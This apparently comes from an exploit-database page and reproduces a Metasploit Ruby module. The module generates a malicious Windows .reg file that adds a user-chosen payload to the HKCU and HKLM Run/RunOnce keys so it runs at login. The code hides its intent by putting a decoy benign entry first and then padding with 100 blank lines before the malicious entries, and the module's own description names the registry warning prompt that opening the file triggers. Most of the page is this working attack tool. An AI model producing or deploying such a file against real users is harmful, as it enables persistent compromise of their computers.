Malicious Windows Registration Entries (.reg) File

2025.07.24

Credit: bcoles

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Registration Entries (.reg) File',
        'Description' => %q{
          This module creates a Windows Registration Entries (.reg) file which
          adds the specified payload to the Windows Registry. The payload runs
          upon Windows login for the current user. If the user has elevated
          privileges when opening the file, the payload will run upon login
          when any user logs in.

          The user will receive a warning prompt to confirm Registry changes
          when opening the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['URL', 'https://support.microsoft.com/en-us/topic/how-to-add-modify-or-delete-registry-subkeys-and-values-by-using-a-reg-file-9c7f37cf-a5e9-e1cd-c4fa-2a26218a1a23'],
          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys'],
          ['URL', 'https://learn.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key'],
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 244, # 255 minus "cmd.exe /c " prefix length
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 2000 or newer',
            {
              'RegistryEditorVersion' => '5.00'
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1995-08-24',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The registration entries file name.', 'msf.reg']),
      ]
    )

    register_advanced_options([
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRun', [false, 'Add payload to login for current user.', true]),
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRunOnce', [false, 'Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRun', [false, 'Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions, but all other entries are still added successfully.', true]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRunOnce', [false, 'Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('PrependBenignEntry', [false, 'Prepend a benign registry entry at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the first malicious registry entry.', 100]),
    ])
  end

  # Create a registry entry in Windows .reg file format
  def registry_entry(path, type, key, value)
    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-element-size-limits
    raise "Registry key '#{type}' length (#{key.length}) is too long (max 255)" if key.length > 255
    raise "Registry value '#{value}' length (#{value.length}) is too long (max 16,300)" if value.length > 16_300

    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types
    raise "Unsupported key type '#{type}', excepted REG_SZ" unless type == 'REG_SZ'

    escaped_value = value.gsub('\\', '\\\\\\').gsub('"', '\\\"')
    reg_entry = "[#{path}]\r\n"
    reg_entry << "\"#{key}\"=\"#{escaped_value}\"\r\n"
    vprint_status("Created registry entry:\n#{reg_entry}")
    reg_entry
  end

  # Format commands for use with the appropriate interpreter
  def format_commands(command_string)
    # Strip preceding whitespace as this would prevent execution
    raw_cmd = command_string.to_s.gsub(/^\s*/, '')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    #       the specified ARCH_CMD payload is a string of commands
    #       (not a single command).
    if raw_cmd.include?(' & ')
      cmd = "cmd.exe /c #{raw_cmd}"
    else
      cmd = raw_cmd
    end

    raise "Command length (#{cmd.length}) is too long (max 255)" if cmd.length > 255

    cmd
  end

  def exploit
    # File structure:
    #   File header string
    #   Benign registry entry (optional)
    #   Visual whitespace padding (optional)
    #   HKCU entries
    #   HKLM entries (optional)
    reg = "Windows Registry Editor Version #{target['RegistryEditorVersion']}\r\n"
    reg << "\r\n"

    reg_entries = []

    if datastore['PrependBenignEntry']
      path = "HKEY_CURRENT_USER\\Software\\#{rand_text_alphanumeric(10..16)}"
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        rand_text_alphanumeric(10..16)
      )
      reg_entries << path + '\\' + key
    end

    reg << "\r\n" * datastore['PrependNewLines']

    if datastore['AddToCurrentUserWindowsCurrentVersionRun']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToCurrentUserWindowsCurrentVersionRunOnce']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRun']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRunOnce']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    unless reg_entries
      fail_with(Failure::BadConfig, 'No registry entries were created! Check module advanced options.')
    end

    file_create(reg)

    print_status("This file will create the following registry keys:\n#{reg_entries.join("\n")}")
  rescue StandardError => e
    print_error(e.message)
  end
end

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Malicious Windows Registration Entries (.reg) File

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.